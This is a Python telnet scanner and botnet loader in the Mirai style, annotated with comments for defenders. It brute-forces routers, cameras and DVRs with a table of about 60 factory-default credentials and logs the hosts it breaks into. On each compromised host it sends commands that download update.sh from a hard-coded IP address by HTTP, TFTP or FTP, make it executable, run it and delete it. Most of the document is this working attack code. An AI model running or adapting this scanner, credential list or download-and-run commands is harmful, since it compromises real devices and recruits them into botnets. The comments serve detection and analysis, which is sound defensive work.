- #!/usr/bin/python
- import threading
- import sys, os, re, time, socket, random, select
- # Argument check: the script expects a target list file, a thread count and an output file.
- if len(sys.argv) < 4:
- print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
- sys.exit()
- # Command strings that run() sends to a device after a successful telnet login.
- # Each one changes to the first directory it can enter, fetches `update.sh` from
- # 185.10.68.196 (wget over HTTP, then TFTP, then anonymous FTP on port 21), makes it
- # world-writable/executable, runs it with sh and deletes it.
- # Defender notes: 185.10.68.196 and the file name update.sh are the indicators this
- # sample exposes. The `cd /tmp || cd /var/run || ...` chain followed by a (busybox)
- # download, `chmod 777` and `rm -rf` is a practical command-line detection pattern on
- # embedded Linux. Because the script is removed after it runs, on-disk artefacts may be
- # absent; network and process telemetry are the more reliable evidence.
- wget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.196/update.sh -O update.sh; busybox wget http://185.10.68.196/update.sh -O update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #wget command to send
- tftp = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r update.sh -g 185.10.68.196; busybox tftp -r update.sh -g 185.10.68.196; chmod 777 update.sh; sh update.sh; rm -rf update.sh" #tftp command to send
- ftpget = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 185.10.68.196 update.sh update.sh; chmod 777 update.sh; sh update.sh; rm -rf update.sh"
- # "username:password" pairs that run() splits on ":" and tries in order over telnet.
- # These are vendor/factory defaults for routers, cameras, DVRs and similar devices;
- # several (e.g. root:xc3511, root:vizxv, root:7ujMko0admin) also appear in the publicly
- # documented Mirai default-credential table.
- # Defender notes: any device that still accepts one of these pairs on a reachable
- # telnet service should be considered exposed. Change or disable the default account,
- # turn telnet off where the device allows it, and alert on repeated telnet logins that
- # cycle through these user names from a single source.
- combo = [
- "root:root",
- "root:",
- "admin:admin",
- "support:support",
- "user:user",
- "admin:",
- "admin:password",
- "root:vizxv",
- "root:admin",
- "root:xc3511",
- "root:888888",
- "root:xmhdipc",
- "root:default",
- "root:juantech",
- "root:123456",
- "root:54321",
- "root:12345",
- "root:pass",
- "ubnt:ubnt",
- "root:klv1234",
- "root:Zte521",
- "root:hi3518",
- "root:jvbzd",
- "root:anko",
- "root:zlxx.",
- "root:7ujMko0vizxv",
- "root:7ujMko0admin",
- "root:system",
- "root:ikwb",
- "root:dreambox",
- "root:user",
- "root:realtek",
- "root:00000000",
- "admin:1111111",
- "admin:1234",
- "admin:12345",
- "admin:54321",
- "admin:123456",
- "admin:7ujMko0admin",
- "admin:1234",
- "admin:pass",
- "admin:meinsm",
- "admin:admin1234",
- "root:1111",
- "admin:smcadmin",
- "admin:1111",
- "root:666666",
- "root:password",
- "root:1234",
- "root:klv123",
- "Administrator:admin",
- "service:service",
- "supervisor:supervisor",
- "guest:guest",
- "guest:12345",
- "guest:12345",
- "admin1:password",
- "administrator:1234",
- "666666:666666",
- "888888:888888",
- "tech:tech",
- "mother:fucker"
- ]
- # Target list: read from the file named by the first argument, carriage returns
- # stripped, one entry per line.
- IPs = open(sys.argv[1], "r").read().replace("\r", "").split("\n")
- # The list is shuffled, so in flow logs the attempts will not show up as a sequential
- # address sweep; detection should key on the fan-out to TCP/23 rather than on ordering.
- random.shuffle(IPs)
- # Second argument: upper bound on concurrently running router threads (see worker()).
- threads = int(sys.argv[2])
- # Third argument: file that receives one line per host where a login succeeded.
- output_file = sys.argv[3]
- # Read from socket `tn` in 1024-byte chunks until `string` appears in the accumulated
- # data, then return everything received so far. The elapsed-time check runs between
- # recv() calls; once `timeout` seconds (default 8) have passed without a match, a plain
- # Exception('TIMEOUT!') is raised. run() uses this to wait for the ":" of the
- # login and password prompts.
- def readUntil(tn, string, timeout=8):
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += tn.recv(1024)
- time.sleep(0.1)
- if string in buf: return buf
- raise Exception('TIMEOUT!')
- # Single bounded read: switch `sock` to non-blocking mode, wait with select() for up to
- # `timeout` seconds (default 8) for it to become readable, and return up to `size` bytes.
- # Returns an empty string when nothing arrives in time.
- def recvTimeout(sock, size, timeout=8):
- sock.setblocking(0)
- ready = select.select([sock], [], [], timeout)
- if ready[0]:
- data = sock.recv(size)
- return data
- return ""
- # Shared state for all threads. `active` counts running router threads: run()
- # increments it on entry and decrements it on exit, and worker() compares it with the
- # thread limit. The counter is updated without a lock.
- global active
- active = 0
- # Results file, opened in append mode; run() writes "ip:23 user:password" lines to it.
- # For responders, this file (and infected.txt, written in run()) is the operator-side
- # record of which hosts accepted a login.
- global fh
- fh = open(output_file, "a")
- # One thread per target address. run() tries each entry of `combo` against telnet
- # (TCP/23); when the reply looks like a shell prompt it records the credentials and
- # sends the module-level wget / tftp / ftpget command strings.
- # NOTE(review): indentation was lost in this paste, so the exact nesting of the
- # try/except/else arms below cannot be confirmed from the listing; the comments describe
- # the statements in the order they appear.
- # Defender summary: the observable behaviour is many short TCP/23 connections from one
- # source, a login attempt, then `sh`, `shell`, `ls /` within about a second, followed by
- # download commands that reference update.sh. Mitigations are disabling telnet, replacing
- # default credentials, and blocking outbound HTTP/TFTP/FTP from device networks.
- class router(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- # Target address, with any trailing newline from the list file removed.
- self.ip = str(ip).rstrip('\n')
- def run(self):
- global active
- global fh
- active += 1
- username = ""
- password = ""
- cracked = False
- for passwd in combo:
- if cracked:
- break
- # ":n/a" / "n/a:" are markers for an empty password / user name; no entry in the
- # combo list of this paste uses them, so both fields normally come from the split.
- if ":n/a" in passwd:
- password=""
- else:
- password=passwd.split(":")[1]
- if "n/a:" in passwd:
- username=""
- else:
- username=passwd.split(":")[0]
- # A fresh TCP connection to port 23 is opened for every credential pair, with a
- # 0.5 s socket timeout. On a connection error the socket is closed and the loop
- # is left (presumably abandoning this host - nesting not confirmable here).
- try:
- tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- tn.settimeout(0.5)
- tn.connect((self.ip, 23))
- except Exception:
- try:
- tn.close()
- except:
- pass
- break
- try:
- # Wait for a ":" (login prompt) and send the user name, then wait for the next
- # ":" (password prompt) and send the password.
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(username + "\n")
- time.sleep(0.1)
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(password + "\n")
- time.sleep(0.8)
- else:
- pass
- # The reply after the password is classified as a shell when it contains ">",
- # "#", "$" or "root@". A telnet honeypot that answers with such a prompt will
- # therefore receive the follow-up commands below and can log them.
- prompt = ''
- prompt += tn.recv(8912)
- if ">" in prompt and "ONT" not in prompt:
- success = True
- elif "#" in prompt or "$" in prompt or "root@" in prompt or ">" in prompt:
- success = True
- else:
- tn.close()
- if success == True:
- try:
- print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
- cracked = True
- # Working credentials are appended to the output file as "ip:23 user:password".
- fh.write(self.ip + ":23 " + username + ":" + password + "\n")
- fh.flush()
- # Probe sequence `sh`, `shell`, `ls /`: this fixed trio directly after login is a
- # strong session-level signature for telnet logs and honeypots.
- tn.send("sh\r\n")
- time.sleep(0.1)
- tn.send("shell\r\n")
- time.sleep(0.1)
- tn.send("ls /\r\n")
- time.sleep(1)
- timeout = 8
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += recvTimeout(tn, 8912)
- time.sleep(0.1)
- # A directory listing that contains "tmp" and no "unrecognized" is taken as proof
- # of a usable shell. The host is then logged to infected.txt and the three download
- # command strings are sent 10 s apart (HTTP, TFTP, FTP to the address they embed).
- if "tmp" in buf and "unrecognized" not in buf:
- f = open("infected.txt", "a")
- f.write(self.ip + ":23 " + username + ":" + password + "\n")
- f.close()
- print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
- tn.send(wget + "\r\n")
- time.sleep(10)
- tn.send(tftp + "\r\n")
- time.sleep(10)
- tn.send(ftpget + "\r\n")
- time.sleep(10)
- tn.close()
- break
- tn.close()
- break
- except:
- tn.close()
- else:
- tn.close()
- except Exception:
- tn.close()
- # Thread is finished with this host; release its slot in the concurrency counter.
- active -= 1
- # Dispatcher: walks the shuffled target list and starts one router thread per entry.
- # Before each start it spins (no sleep) until the global `active` count is below the
- # `threads` limit; exceptions raised while creating or starting a thread are swallowed
- # and the start is retried.
- def worker():
- for IP in IPs:
- threadstarted = False
- while not threadstarted:
- if active < threads:
- try:
- thread = router(IP)
- thread.start()
- threadstarted = True
- except:
- pass
- threading.Thread(target = worker, args = ()).start()
- raw_input()
- os.kill(os.getpid(), 9)